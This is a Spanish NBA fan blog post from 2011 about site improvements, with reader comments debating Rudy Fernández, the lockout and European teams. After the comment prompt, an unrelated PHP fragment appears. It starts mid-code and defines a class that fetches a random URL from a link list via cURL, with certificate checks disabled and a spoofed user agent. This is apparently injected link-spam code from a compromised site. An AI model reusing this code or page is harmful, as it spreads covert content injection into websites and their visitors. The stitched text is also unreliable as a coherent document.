Ya estamos de vuelta

29 de September de 2011 por txusma

Al final todo ha sido más fácil de lo que creíamos y ya estamos de nuevo disponibles para todos los amantes de la NBA. Os explicamos las 4 novedades:

  • Hemos actualizado la versión de WordPress. Nos habíamos quedado un poco anticuados y no disponer de la última versión es siempre un problema de seguridad.
  • Nuevo bloque lateral: Ahora podemos consultar en un momentos los últimos comentarios, los artículos más comentados, los más vistos y la nube de etiquetas.
  • Blog Tjnba en twitter: Desde hace un tiempo estamos en Twitter y hemos decidido potenciar un poco este apartado. Muchas noticias o rumores que no tienen por si solos el interés suficiente para merecer un artículo serán publicados en twitter. Gracias a este apartado del blog, los que no sois usuarios podréis también informaros de qué es lo que contamos allí. Esperemos ahora que Twitter no falle mucho.
  • Ahora se muestran las etiquetas de cada post. Etiquetar los artículos era algo que nos parecía secundario pero hemos decidido organizar mejor este aspecto junto al de las categorías. En teoría os ha de ayudar a consultar la información que ya ha sido publicada. Nos queda un arduo trabajo en forma de etiquetar correctamente artículos anteriores. Poco a poco y con buena letra.
  • Nueva barra para compartir un artículo. Se puede twittear el artículo, compartir en Facebook, decir simplemente que te gusta o compartilo en Google+. No sabemos si alguien utiliza estas opciones pero siempre es bueno estar preparado.
  • Posibilidad de citar otro comentario. Alguien nos había dicho que le gustaría poder citar el contenido de un comentario previo o una parte de este. Ahora es posible hacerlo.

Si alguna cosa nos os acaba de convencer, por favor no dudéis en comentarlo. Cualquier sugerencia será bien recibida. Como siempre.

Comenta

13 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Tienen buena pinta los cambios. Ahora a ver si termina el lockout de una puñetera vez y empiezan las especulaciones (ahí twitter sí que es fundamental, para rumores de trade etc).
    Lo de citar comentarios es cojonudo, buen trabajo gente

      Citar

  2. Rompe dice:
    #2

    HisRoyalAirness:
    Tienen buena pinta los cambios. Ahora a ver si termina el lockout de una puñetera vez y empiezan las especulaciones (ahí twitter sí que es fundamental, para rumores de trade etc).
    Lo de citar comentarios es cojonudo, buen trabajo gente

    Sí que es cojonudo sí!
    Gracias chicos, un año más espero seguir la NBA por este blog (si es que al final la hay…).

      Citar

  3. Sancho88 dice:
    #3

    Las citas son un regalo, fomentarán los debates más ordenados. Buenos cambios gente

      Citar

  4. Sancho88 dice:
    #4

    ¿El karma de Rudy en Madrid tiene la misma pinta que el de Lebron en Cleveland? Espectacular borrada de Rodolfo para la supercopa. No creo que sea el único que piensa lo que estamos pensando todos, verdad?

      Citar

  5. M dice:
    #5

    Algo así, aunque no querría pensarlo del todo, porque hablaría muy muy mal del jugador. Buenos cambios, gracias por tener la página siempre presta a nuevas mejoras, nos vemos 🙂

      Citar

  6. Sancho88 dice:
    #6

    Vale, yo creo que fui un poco sensacionalista, pero tambien es verdad que no se puede obviar que muchos pensaban y pensábamos que el viernes se podría arreglar el lockout. Ahora la cosa pinta más difícil. Ahora la pregunta más seria es: ¿Pensáis que Rudy volverá alguna vez a la NBA?

    Yo me dejé llevar por la emoción de la deserción y pensé que sí, pero reflexionando seriamente… una vez que te vas de allí, y más de la manera en la que lo ha hecho Rudy, tiene muy complicado volver. A ver si se decide mentalmente a olvidar el sueño americano y le pone salsa a esta liga de los hunos blaugranas que no dejarán ni una tizna de parqué viva a su paso por los estadios.

    La otra pregunta que me surge es: ¿Pensáis que el Barcelona tiene la mejor plantilla de la historia de Europa?
    Yo me mojo y digo que sí, y me cargo de un plumazo el Macabbi de Parker y Jasikevicius, el propio Barsa del triplete, la Kinder de Manudo, etc. Los de los 80 comenzarán a hablar de la Jugoplástica, supongo. Yo me refiero más bien a plantilla por nombres, porque hay equipos por ahí como aquel que consiguieron tres copas de europa, igual que el Madrid de los años la pera y demás.

      Citar

  7. M dice:
    #7

    Yo no vi nunca nada igual a la Juoplástika, aunque me pillo muy niño y todo lo exageras más, supongo. Yo no veo una plantilla tan superior a las demás del Barça, aunque es sin duda el rival a batir. A mí CSKA me parece muy muy fuerte.

    Y lo de Rudy es raro, desde luego…pero como muchas cosas, que diga que quiere volver a Europa no parece el mejor modo de labrarse una carrera allí. Pero la verdad es que si no te dan bola en la NBA vuelve a Europa y juega como sabes, sin más. Aunque no lo digas a mitad de contrato, melón 😀

      Citar

  8. Denise dice:
    #8

    Lo de poder citar a otro me gusta. Enhorabuena

      Citar

  9. Txusma dice:
    #9

    En twitter lanzamos una pregunta relacionada con Rudy hace unos días: Si tu forma parte del staff técnico de los Mavs, le darías minutos a un tío que sabes que al acabar el año se volverá a Europa y no seguirá en el equipo? Supongo que si Rudy es claramente superior a sus competidores en el puesto mientras haya posibilidades reales de ganar sí, pero en cuanto la cosa se desmadre mejor darle minutos a algún rookie o jugadores de 2º año. En caso de haber temporada no le auguro yo un año fácil al mallorquín

      Citar

  10. Nacho dice:
    #10

    Si yo formo parte del staff técnico, y lo considero válido, le doy minutos y responde, procuraría darle incluso más mimos para que se quedase. Obviamente esto parece una utopía, en la que ni Rudy cree. Aparte de que él haya fallado, creo que McMillan le ha hecho un flaco favor al jugador, al espectáculo y a la propia NBA. Hay cosas que algunos técnicos NBA se deberían mirar. Por ejemplolos que dejaron escapar a tíos como Jasikevicius, y Navarro. Los listos de Menphis supongo que se estarán tirando de los pelos (claro, si vieron algo del europeo, porque de lal liga ni de coña)

      Citar

  11. Sancho88 dice:
    #11

    Sí, lo de Navarro fue flagrante. Él dijo que dejaron de sacarle para ver como iban los jóvenes y tal. La gestión de Memphis aquellos años era un cachondeo, ahora parece que les van saliendo las cosas.
    Rudy Fernández, y no me columpio, es bastante mejor que Barea, Beaubois, y si me apuras Jason Terry. Hmmm…. el problema surge con las ganas reales de un jugador de triunfar en esa liga, meterse en el royo que conlleva tener status de jugador principal en un equipo y demás. Él llegó sabiendo inglés, con un buen caché después de las olimpiadas de Pekin y siendo el tercer mejor jugador de España.
    No sé que culpa tendrá o no McMillan de que Rudy acabara siendo un agitador de cinco minutos, que salía para revolucionar los partidos. Totalmente desaprovechado, en definitiva.
    A la pregunta de si yo soy del staff técnico, primero preguntarme cómo hemos dejado ir a Rudy. En serio, gastarse la pasta y que un jugador se escape sin disputar ni un minuto es sonrojante. Supongo que intentaría hacerle volver si comienza la temporada, pero no podría hacerle comprometerse si él quiere estar en España y no quiere jugar para el campeón de la NBA. Realmente la NBA tiene un ritmo particular, y no pasará nada si Rudy se queda en España. Allí no hay nadie imprescindible. Puedes dar una patada a una piedra y salir un escolta físicamente igual o mejor que Rudy, con más defensa y físico para aguantar una temporada de casi 100 partidos con playoffs incluídos. No tendrá el talento de Rudy, pero encajará en la liga, acabará tirando decentemente y será aprovechable. Es el caso de Batum, a mi juicio. Ese chico cuando llegó a Portland tenía un tiro horrible, y Rudy no podía imaginar que tras la lesión de Roy fuera fundamental Batum en vez de él. No digo esta temporada, en la que Batum ya era buenísimo, digo hace dos temporadas, que el chico llegó a la liga y era un poco bastante desastre. Esto quiere decir que no hay nadie imprescindible y que como ya se ha dicho, la reacción en Dallas ante la deserción de Rudy ha sido de indiferencia. Es así. Iavaroni conservó el puesto a pesar de ningunear a Navarro, mejor que todo lo que tenía en aquella época Memphis. Jasikevicius fracasó, Spanoulis, Macijauskas, Rudy… no pasó nada. Bodiroga tampoco fue y no pasó nada. A ellos se la pela un poco que en Europa seas bueno. Les vale lo que demuestras allí, viven en su burbuja, en su campeonato del mundo de la NBA y demás. Así que si yo fuera del staff técnico, me olvidaría en un día de Rudy y exploraría otras opciones, con otros agentes, sabiendo que ahora Dallas es primera plana al ser campeones y su mercado se amplía exponencialmente. Quien no quisiera ser el sustituto de Stojakovic… les saldrán pretendientes a patadas

      Citar

  12. Denise dice:
    #12

    Sancho88:
    Sí, lo de Navarro fue flagrante. Él dijo que dejaron de sacarle para ver como iban los jóvenes y tal. La gestión de Memphis aquellos años era un cachondeo, ahora parece que les van saliendo las cosas.
    Rudy Fernández, y no me columpio, es bastante mejor que Barea, Beaubois, y si me apuras Jason Terry.

    Respeto tu opinion pero creo que te columpias. De Beaubois si tiene mas calidad, que Barea no lo comparo porque no ocupan la misma posicion. Pero de Jason Terry?? Terry le da 1000 vueltas a Rudy!!! Es blasfemar a Jason Terry!!

      Citar

  13. Txusma dice:
    #13

    No queda nada mal lo de las citas 😀

    El caso Rudy parece tener mucho de psicológico. Llegó a la NBA siendo una auténtica estrella en Europa y creo q no acabó de encajar bien encontrarse con un cabeza cuadrada como McMillan. Lo malo es que ahora parecía que llegaba a un equipo muy interesante para destacar y firma para volverse a Europa.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>